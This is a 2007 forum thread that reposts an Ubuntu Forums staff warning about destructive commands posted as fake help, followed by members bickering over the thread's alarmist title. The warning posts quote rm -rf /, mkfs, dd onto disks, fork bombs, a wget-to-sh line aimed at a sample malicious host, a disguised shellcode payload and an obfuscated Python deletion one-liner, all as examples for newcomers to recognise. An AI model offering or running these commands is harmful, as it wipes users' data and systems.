# Ubuntu users alert..malicious code on prowl..



## naveen_reloaded (Nov 28, 2007)

ATTENTION ALL USERS: 
Malicious Commands 




I'd like to take a moment of 
your time to discuss a recent 
disturbing trend the staff has 
been noticing on the forums, 
and also take this as an 
opportunity to raise awareness 
of this situation through 
education. 

We've recently had an 
increase in the number of 
dangerous commands being 
posted on the forums. Don't 
pretend you don't know what I 
mean -- commands that cause 
massive damage or disruption 
to the user's computer. 

I'd just like to caution those 
thinking of doing this that  
UbuntuForums has a strict 
zero-tolerance policy when it 
comes to posting dangerous 
commands . If you post one of 
them, particularly in a support 
thread disguised as advice, 
expect to be  instantly and 
permanently BANNED , at the 
account, e-mail, IP, or ISP 
level. I do not care about 
intent -- if you mean it as a 
joke, it is not funny. If you 
mean it as a lesson, go teach 
it somewhere else. This 
behavior is absolutely against 
the Forum Guidelines and 
Ubuntu Code of Conduct. 

I'd also like to remind users to 
be cautious when someone 
tells you to run some 
command or download some 
script as a solution to your 
problem. When in doubt as to 
the safety of the procedure, 
it's always a good idea to wait 
for more opinions, and/or have 
the command explained to you 
and verify if the explanation 
makes sense by consulting 
readily available 
documentation on Linux 
commands (such as 
manpages). No matter how 
hard we try to stay on top of 
all posts in realtime, we are 
not perfect. 

Regards, 

The UbuntuForums Staff. 

As requested by some, for the 
education of our users, here 
are some common examples 
of dangerous commands that 
should raise a bright red flag. 
Again,  these are extremely 
dangerous and should not be 
attempted on a computer that 
has any physical connection to 
valuable data -- many of them 
will even cause damage from 
a LiveCD environment. 

Again,  DANGEROUS 
COMMANDS -- look but  DO 
NOT RUN . 

Also,  this is far from an 
exhaustive list , but should give 
you some clues as to what 
kind of things people may try 
to trick you into doing. 
Remember this can always be  
disguised  in an obfuscated 
command or as a part of a 
long procedure, so the bottom 
line is take caution for 
yourself when something just 
doesn't "feel right". 

Delete all files, delete current 
directory, and delete visible 
files in current directory. It's 
quite obvious why these 
commands can be dangerous 
to execute. 

Code: 



rm -rf / rm -rf. rm -rf * 



Reformat: Data on device 
mentioned after the mkfs 
command will be destroyed 
and replaced with a blank 
filesystem. 

Code: 



mkfs mkfs.ext3 mkfs.anything 



Block device manipulation: 
Causes raw data to be written 
to a block device. Often times 
this will clobber the filesystem 
and cause total loss of data: 

Code: 



any_command > /dev/sda dd 
if=something of=/dev/sda 



Forkbomb: Executes a huge 
number of processes until 
system freezes, forcing you to 
do a hard reset which may 
cause corruption, data 
damage, or other awful fates. 

In Bourne-ish shells, like Bash: 
(This thing looks really 
intriguing and curiousity 
provokes) 

Code: 



){:&};: 



In Perl 

Code: 



fork while fork 



Tarbomb: Someone asks you 
to extract a tar archive into an 
existing directory. This tar 
archive can be crafted to 
explode into a million files, or 
inject files into the system by 
guessing filenames.  You 
should make the habit of 
decompressing tars inside a 
cleanly made directory 

Decompression bomb: 
Someone asks you to extract 
an archive which appears to 
be a small download. In reality 
it's highly compressed data 
and will inflate to hundreds of 
GB's, filling your hard drive.  
You should not touch data 
from an untrusted source 

Shellscript: Someone gives you 
the link to a shellscript to 
execute. This can contain any 
command he chooses -- benign 
or malevolent.  Do not execute 
code from people you don't 
trust 

Code: 



wget  
*some_place/some_file 
sh./some_file 



Code: 

wget  
*some_place/some_file  - 
O- | sh 



Compiling code: Someone 
gives you source code then 
tells you to compile it. It is 
easy to hide malicious code as 
a part of a large wad of 
source code, and source code 
gives the attacker a lot more 
creativity for disguising 
malicious payloads.  Do not 
compile OR execute the 
compiled code  unless the 
source is of some well-known 
application, obtained from a 
reputable site (i.e. 
SourceForge, the author's 
homepage, an Ubuntu 
address). 

A famous example of this 
surfaced on a mailing list 
disguised as a  proof of concept 
sudo exploit  claiming that if 
you run it, sudo grants you 
root without a shell. In it was 
this payload: 

Code: 



char esp[] __attribute__ 
((section(".text"))) /* e.s.p 
release */    = "\xeb\x3 e\x5 
b\x31 \xc0 \x50 \x54 \x5 a\x83 
\xec\x64 \x68 "     
"\xff\xff\xff\xff\x68 \xdf\xd0 
\xdf\xd9 \x68 \x8 d\x99 "     
"\xdf\x81 \x68 \x8 d\x92 \xdf\xd2 
\x54 \x5 e\xf7 \x16 \xf7"      "\x56 
\x04 \xf7 \x56 \x08 \xf7 \x56 \x0 
c\x83 \xc4 \x74 \x56 "     "\x8 d\x73 
\x08 \x56 \x53 \x54 \x59 \xb0 \x0 
b\xcd\x80 \x31 "     "\xc0 \x40 
\xeb\xf9 \xe8 \xbd\xff\xff\xff\x2 
f\x62 \x69 "     "\x6 e\x2 f\x73 \x68 
\x00 \x2 d\x63 \x00 "     "cp -p 
/bin/sh /tmp/.beyond; chmod 
4755  /tmp/.beyond;";  


For more detail visit  *www.ubuntuforums.org/announcement.php?a=54


----------



## praka123 (Nov 28, 2007)

LOL!  do u think this is a news?what malicious i cant find any 
frustration of a virus bloated windows user!
yes.indeed command line is the power house and root/sudo is needed for something to "work".that's why no viruses even if popularity increases for Linux also no viruses are able to destruct.only worms which can corrupt elf binary exists.
and this sucks.u directly posted these commands for making some BAD news reg Linux due to ur winboyness  .mind edit/remove those commands.post the basic things and ubuntuforums.org link.
this is what sarcastic about Vista boys,they want to defame Linux and FOSS,and ofcourse Mac OS X  BS!
*warning:No Linux user esp windows converts try those commands!*


----------



## cool_techie_tvm (Nov 28, 2007)

Well thanks for the info, ubuntu n00b in here


----------



## naveen_reloaded (Nov 28, 2007)

I just wanted to warn others..
Why are yöü soo irritated..cant stand a news against ubuntu?


----------



## praka123 (Nov 28, 2007)

if i post a tip running  "cmd" to delete ur partition,do u feel for it?
there is nothing special in this case.this is made a news thx to Vista sucks news circulating!


----------



## cool_techie_tvm (Nov 28, 2007)

Here is the official link to that announcement *ubuntuforums.org/announcement.php?f=73

Its pretty much readable (no offense naveen_reloaded)


----------



## ray|raven (Nov 28, 2007)

Malicious code on the prowl?Lolz.
Dude, you better change the title.Its very misleading.
That announcement in the ubuntu forums was posted as a warning to newbies to stop them from running every darn command posted.

U talk as if there's a virus attacking every ubuntu system out there.
it's like saying running format c:\ will erase everything on c drive so format is a mailicious tool.

Oh and please format that post.
It looks very bad.

Reported for misleading title/post.

Regards,
ray


----------



## praka123 (Nov 28, 2007)

well said rayraven!I got very much angry first when he posted this as some thing big fault!   well for truth,shell opens ur Linux box,but posting this here as a vulnerability is irritating.I think he dont know what shell means.

these are few samples shown.and to prevent this FUD from Vista boy,I urge users to read:


> *  One of the most common questions I hear new Linux users ask is "What program should I use for virus protection?" Many of them lose faith in me as a source of security information when I reply, "None." But you really don't need to fear malware on your new platform, thanks to the way Linux is built.
> Savvy Windows users have to watch their virus checkers as closely as the head nurse in the ICU keeps an eye on patient monitors. Often, the buzz in the Windows security world is about which protection-for-profit firm was the first to discover and offer protection for the malware du jour -- or should I say malware de l'heure? The only thing better than having backed the winning Super Bowl team come Monday morning at the office coffeepot is having the virus checker you use be the one winning the malware sweepstakes that weekend.
> 
> If a rogue program finds a crack in your Windows armor, paying $200 per infection to have your machine scrubbed and sanitized by the local goon^H^H^H^H geek squad not only helps to reinforce the notion that you have to have malware protection, but that it has to be the right protection, too. The malware firms are aware of this, and all of their advertising plays upon the insecurity fears of Windows users and the paranoia that results. Chronic exposure and vulnerability to malware has conditioned Windows users to accept this security tax.
> ...


 read the full article


----------



## infra_red_dude (Nov 28, 2007)

Hey guys, don't get mad at Naveen. He's only posted something which will be useful to all Linux noobs. Just that the title was misleading.

@Naveen
Thanks for posting it here  Kindly contact the mods and change the thread title to - "Warning: Linux users, do not try these commands"


----------



## ray|raven (Nov 28, 2007)

@praka123
Nice link mate.A Must read for all new linux users.
Especially this part IMO.


> Linux users, like users on every operating system, must always be aware of security issues. They must act intelligently to keep their systems safe and secure. They should not run programs with root privileges when they are not required, and they should apply security patches regularly.
> 
> Misleading claims and false advertising by virus protection rackets to the contrary, you simply don't need antivirus products to keep your Linux box free of malware.



Regards,
ray


----------



## praka123 (Nov 28, 2007)

BTW,I am not a fan of "sudo" anyway.sudo is there for n00bish users that Ubuntu uses it.I prefer a root login or "su -" anytime.it is better  Debian defaults to su.


----------



## naveen_reloaded (Nov 28, 2007)

Well since i am posting from my mobile,if anybody is using from mobile knows how difficult to post a thread thru mobile.
Ya title may be misleading,why take that way?instead let it be a warning to all.,
Ok if any mod is out there please change the title.


I posted not to offend any ubuntu user..i just posted so that not so techie linux users..can get benefit. 
Ya vista is good,when compared to this horrifying commands even regular users have fallen to.
It that manner vista is very good.
Atleast we dont need to bother about keyboard to make one thing work.

@infra red dude

Thanks for supporting and understanding what i did


----------



## Gigacore (Nov 28, 2007)

offtopic: hey naveen, why is all ur recent posts NARROW ???


----------



## naveen_reloaded (Nov 28, 2007)

Coz i am typing from mobile ..opera mini.
Dont know why.
May be its causing it...
Dont know really.


----------



## Faun (Nov 28, 2007)

lol..i thought it was something related to security breach.

already bookmarked it a week before.
Btw u went to ubuntu forums just to post this here ?

lot of these are well known to linux users.

formatting of text is screwed up.


----------



## praka123 (Nov 28, 2007)

^that's what i also thought!  pretty difficult to see it as a help for ubuntu users!rather the title suggests that Ubuntu is like Vista wtf


----------



## NucleusKore (Nov 28, 2007)

Looks like I'm late
Yes the title is very misleading, please change it. And I think you can edit your post and fix the formatting from a pc, its too longish.
As Praka et al have pointed out, there are "dangerous" commands in Windows too


----------



## naveen_reloaded (Nov 28, 2007)

Its not possible to change to title from the edit guys.only MODS can change it.


----------



## Ecko (Nov 28, 2007)

The following commands can cause massive damage to your Ubuntu operating system! Please DO NOT execute any of them, just read and learn!

CODE

sudo rm -rf / (This will delete all your files on your system) - Needs administrator rights!
sudo rm -rf . (This will delete the current directory your in) - Needs administrator rights!
sudo rm -rf * (This will delete all the files in the current folder) - Needs administrator rights!
rm -rf * or rm -rf *.* (This will delete all the files in the current folder) - No administrator rights needed!
rm -rf ~ / & (This will destroy your home directory) - No administrator rights needed!


All the below commands will erase your hard drive!

CODE

sudo mkfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.ext3 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.bfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.cramfs (This will format your hard drive) - No administrator rights needed!
sudo mkfs.ext2 (This will format your hard drive) - Needs administrator rights!
sudo mkfs.minix (This will format your hard drive) - Needs administrator rights!
sudo mkfs.msdos (This will format your hard drive) - Needs administrator rights!
sudo mkfs.reiserfs (This will format your hard drive) - Needs administrator rights!
sudo mkfs.vfat (This will format your hard drive) - Needs administrator rights!


The dd command can be very dangerous, especially when you have no idea what it does! Below are some examples, but remember that these can vary often!

CODE

sudo dd if=/dev/zero of=/dev/hda (VERY DANGEROUS COMMAND! It will zero out the whole primary IDE hard drive) (Needs administrator rights)
sudo dd if=/dev/hda of=/dev/hdb (Needs administrator rights)
sudo dd if=something of=/dev/hda (Needs administrator rights)


WARNING: /dev/hda and /dev/hdb from the above example can be replaced with /dev/sda or /dev/sdb or any partition or hard drive you may have on your system!

Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data!

CODE

any_command > /dev/sda
dd if=something of=/dev/sda


Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates!

The below command looks really intriguing and curiosity may lead new and inexperienced users to execute it! DON'T EXECUTE THEM!

CODE

){:&};:


CODE

fork while fork


Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory!

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GBs, filling your hard drive. You should not touch data from an untrusted source!

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust!

CODE

wget *some_place/some_file
sh ./some_file

Example: wget *hax018r.org/malicious-script
sh ./malicious-script


or

CODE

wget *some_place/some_file -O- | sh

Example: wget *hax018r.org/malicious-script -O- | sh


WARNING: Remember that the above examples can have any name!

Compiling code: Someone gives you a source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. Softpedia, SourceForge, Freshmeat, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. There was this payload:

CODE

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";


To the new and inexperienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms. Watch out!

Here's another example of code that should definitely NOT be executed by anyone!

CODE

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'


Where "sn!.sg!+" is simply rm -rf * shifted a character up.

In conclusion, all new and inexperienced users who want to learn Ubuntu should start learning the above commands first and what they can do to your system.

Credits: Some of the above examples of malicious code were taken from the Ubuntu Forums announcement.


----------



## cool_techie_tvm (Nov 28, 2007)

Guess what, this has even made it to the front page of digg !! 

*www.digg.com/linux_unix/Ubuntu_Malicious_Command_Warning


----------



## Faun (Nov 28, 2007)

cool_techie_tvm said:
			
		

> Guess what, this has even made it to the front page of digg !!
> 
> *www.digg.com/linux_unix/Ubuntu_Malicious_Command_Warning



lol...digg it man


----------



## Sykora (Nov 28, 2007)

@praka et al : Why is everyone bashing naveen? IMO this is one of the most important pieces of advice one can give to new linux user.It tells them that Linux is secure enough that the only way the system will crash is if you do something stupid -- the point remains that it can still be crashed, so watch out.

Good post, but I'm surprised it took so long for people to start (both posting malicious code, and noticing that it was being posted).


----------



## NucleusKore (Nov 28, 2007)

@Sykora....look at the thread title
"Ubuntu users alert..malicious code on prowl.."
I was expecting a vulnerability as in a virus when I opened this thread.
Yes the commands are dangerous but it could have been presented more accurately. Its more like don't openly trust anyone you meet on any forum, no offence meant to any fresh stock here, but its a precaution you take on ANY forum, not necessarily computing.

Also note there is a difference between dangerous and malicious. Format in Windows can be a dangerous command if you do not know what you are doing, BUT IT IS NOT MALICIOUS.


----------



## preshit.net (Nov 28, 2007)

Absolutely. Although I really appreciate the OP for the article/post, the title chosen is totally misleading.

No MODS reading this ehh ?

Btw, praka, Nice article there


----------



## Sykora (Nov 28, 2007)

@NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?

I admit the title is _slightly_ off, but certainly not so much to get offended or irritated. At least the title is controversial enough to get everyone to take a look at the thread


----------



## naveen_reloaded (Nov 28, 2007)

^well said.
First i too thought have a created a worst title. 
To say the truth i just copied and pasted just like any other news being submitted here.that too i am doing from mobile,its kinda difficult.
Kindly understand.i just want people to know about these command so that they wont fall for any naughty work of hackers through mail and other stuffs.yes i do agree that linux has got least or no virus...but let me ask..how many of the linux users are well versed with all these commands?
I dont think so many will know.

I that case..atleast many will come to know what these codes are and how they can be harmfull.

Others who are irritated and versed people of ubuntu can go to other thread and reply...
I had no intention of flaming on ubuntu users..i dont know why prak is so irritated...dont worryy dude many things like this are yet to hit net once your ubuntu becomes popular.

Until then your so called vista fanboy like me can atleast have a happy days not worrying about ,how to remember the idiotic commands...which i think only dev should know and bang their heads with...not me..
I didnt start it.yöü did it.
Thanks anyway..


----------



## NucleusKore (Nov 29, 2007)

Sykora said:
			
		

> @NucleusKore : So if I gave you the source code for a virus, it would no longer be malicious?



Is format in windows cli a virus?

I think I made myself quite clear earlier


----------



## Faun (Nov 29, 2007)

i can make a virus, its damn easy:
1) create a .bat file
2) name it XXX.mpg.bat
3) write inside format c:
4) echo u r a dumb addict

done man, yeah it was that easy..lol
wait:
soon a patch willl be coming from MS to correct this malicious code


----------



## NucleusKore (Nov 29, 2007)

Yes it better come soon


----------



## praka123 (Nov 29, 2007)

Lol! :d @t159


----------

